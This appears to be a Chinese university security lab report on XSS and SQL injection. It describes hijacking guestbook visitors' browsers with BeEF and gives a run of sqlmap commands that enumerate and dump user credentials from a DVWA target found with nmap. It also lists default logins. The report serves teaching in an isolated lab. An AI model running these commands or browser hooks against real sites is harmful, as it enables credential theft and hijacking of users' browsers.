实验三 XSS与SQL注入
实验目的
了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。
系统环境
Kali Linux 2、Windows Server
网络环境
交换网络结构
实验工具
Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA
XSS部分:利用Beef劫持被攻击者客户端浏览器
实验环境搭建
角色:留言簿网站。
攻击者:Kali的beEF
被攻击者:访问留言簿网站,浏览器被劫持。
在这里要把搭建的网站的权限打开,才可以留言
1、利用AWVS扫描留言簿网站,发现其存在XSS漏洞
2、 Kali使用beef生成恶意代码
3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板
4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图
将网页重定向为学校主页
SQL注入部分:DVWA+SQLmap+Mysql注入实战
用Nmap扫描同一网段的Metasploitable2的IP地址
得到本机ip
nmap -sP 你所处网段/24
得到处于同一网段所有主机的ip
这样就可以得到Metasploitable2的ip
然后去浏览器输入http://Metasploitable的IP/dvwa,所得结果如图所示
在这里:
默认账号:admin
密码:password
输入账号登录
将SQL Injection中的high级别调为low级别,然后进行尝试SQL注入
开启Firefox浏览器TamperData插件,得到cookies值,在SQL Injection输入1,即可获取cookie
此时得到注入点:http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
TamperData
弹窗获取cookies值:security=low;PHPSESSID=438c6341d84f86576782371e85b0bc03
1、枚举登录MYSQL数据的用户名与密码
输入指令为:sqlmap -u
“http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03”-b --current-db --current-user
2、枚举所有数据库
命令:sqlmap -u “http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03”–string=“Surname” --users --password
3、枚举数据库和指定数据库的数据表
命令:sqlmap -u “http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03” --dbs
命令:sqlmap -u “http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03” -D dvwa --tables
4、获取指定数据库和表中所有列的信息
命令:sqlmap -u “http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03” -D dvwa -T users --columns
5、枚举指定数据表中的所有用户名与密码
命令:sqlmap -u “http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03” -D dvwa -T users -C user,password --dump